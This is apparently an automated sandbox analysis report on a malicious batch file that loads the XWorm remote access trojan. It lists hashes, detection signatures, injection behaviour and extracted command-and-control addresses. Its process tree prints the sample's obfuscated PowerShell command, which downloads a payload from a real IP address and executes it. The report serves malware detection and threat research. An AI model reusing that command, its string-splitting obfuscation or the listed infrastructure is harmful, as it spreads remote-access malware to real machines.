Analysis
-
max time kernel
92s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
04/03/2025, 14:01
Static task
static1
Behavioral task
behavioral1
Sample
cmd.bat
Resource
win7-20240903-en
General
-
Target
cmd.bat
-
Size
180B
-
MD5
b3cede4b5d517877a96f997ef702fb47
-
SHA1
a4aa92e6231e8ac310b32ecfd6d8f82f3b1c76af
-
SHA256
450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f
-
SHA512
5d7e73be8121dd8d3374d773d83f1fc553e748ef863a7fc7d914eecae8d1086dcb17dfc14a36ffd00456802af1f708ea19e8c8887203137c6ecf77c7f1239080
Malware Config
Extracted
http://92.255.57.221/a.mp4
Extracted
xworm
5.0
92.255.57.221:4414
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral2/files/0x000400000001e99a-25.dat family_xworm behavioral2/memory/5116-26-0x0000021DF37C0000-0x0000021DF37D0000-memory.dmp family_xworm behavioral2/memory/4492-28-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 5116 powershell.exe -
pid Process 5116 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5116 set thread context of 4492 5116 powershell.exe 106 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5116 powershell.exe 5116 powershell.exe 5116 powershell.exe 5116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5116 powershell.exe Token: SeDebugPrivilege 4492 MSBuild.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 968 wrote to memory of 5116 968 cmd.exe 86 PID 968 wrote to memory of 5116 968 cmd.exe 86 PID 5116 wrote to memory of 4816 5116 powershell.exe 102 PID 5116 wrote to memory of 4816 5116 powershell.exe 102 PID 4816 wrote to memory of 4888 4816 csc.exe 104 PID 4816 wrote to memory of 4888 4816 csc.exe 104 PID 5116 wrote to memory of 940 5116 powershell.exe 105 PID 5116 wrote to memory of 940 5116 powershell.exe 105 PID 5116 wrote to memory of 940 5116 powershell.exe 105 PID 5116 wrote to memory of 4492 5116 powershell.exe 106 PID 5116 wrote to memory of 4492 5116 powershell.exe 106 PID 5116 wrote to memory of 4492 5116 powershell.exe 106 PID 5116 wrote to memory of 4492 5116 powershell.exe 106 PID 5116 wrote to memory of 4492 5116 powershell.exe 106 PID 5116 wrote to memory of 4492 5116 powershell.exe 106 PID 5116 wrote to memory of 4492 5116 powershell.exe 106 PID 5116 wrote to memory of 4492 5116 powershell.exe 106
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$FC1='ject Net.WebCli';$FC2='loadString(''http://92.255.57.221/a.mp4'')';$FC3='ent).Down';$FC4='(New-Ob';$E5=IEX ($FC4,$FC1,$FC3,$FC2 -Join '')|IEX"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0ccbgwi\i0ccbgwi.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5B1.tmp" "c:\Users\Admin\AppData\Local\Temp\i0ccbgwi\CSC41E91395CD4A4BEDAFAD1B73BDEAFD3E.TMP"4⤵PID:4888
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:940
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50bb13b3b45eacab03762e08565475f8f
SHA11dd00732754113bf39c6942b98e9ded6093f08d5
SHA2564ade1cf6a7bb5fcc3416f2eeb92b2cf4f18657625ffd654a958f2aa62e825a53
SHA51272ce3d04589df8eeb607911adcee38fb8bbefe9024b3a2b7ea668c9b67f880c5f165821128baf2669c5dc293b398c150e79555ff9d6dd2846734893e75ee5551
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
42KB
MD5980dfece86330e17cc6bbba24d3de88c
SHA1bc8689b616814f556bf2d50f67b7c368b91900b6
SHA2567dee4818abfc77f22a4bceb80a122d4f9c07614f3e5914cd8cf05abbbc9c1159
SHA512e1ddf04396ba4ddc5ea9b189a7e9a2e5b6d10a401444c4c13ba85542864db5dd75a083f80e20cf54a622e90a7b055de5be231b1a5d5fb11e07c03c41f70df018
-
Filesize
652B
MD5f31455da4afbe4ff9051a67b50d9e960
SHA13cce84f087b58103108625adc96352e316af42a0
SHA256e27ebca2c0dc6d05211e6b5dfa61cf0513482d89fbeec802218071f57a49e28d
SHA512fabd8b1ffd7940ccbd441b57d6260e4a2437f3a9902c046ce3dcb1f0a1bc2ad6a03c5e73ea49a4c7cb80c574c061cc7d66881bf2fe94c4de3efee50bfe1562f9
-
Filesize
103KB
MD5992ab26a03ded91714491d267da55fb2
SHA125fe04d5493f7e904bd4e64078aa464226e8f393
SHA2563b18772dbf088171f78cccd3da6fb05f46918b2bafa17ab43ea03ec0507935c1
SHA512a1dbfd27e02d10e978475bf9c1279c489e1c9febd8456492e2b0d7df33563c4e81cc28e39f6a90aa82cadc06927bce2f831f2089b5e57da4ea89862a6d82ad0f
-
Filesize
204B
MD55470ba951cc5815e228a00757800b1f5
SHA186b6d7953f5fd12d11c725ae3670ab81150a9168
SHA2568cb70dd10c6bb14d7a90faa4fe96b7277e76954b571dc861c8b105a50c82996e
SHA51288ab169ad4ab521d4720aaa55d0ff9a0ab231b3d32a12d83d54a2b956bce6160dfce02538e49f2dab6fb64187c2c97595b6927d140c25d6cb5cfffcf84433007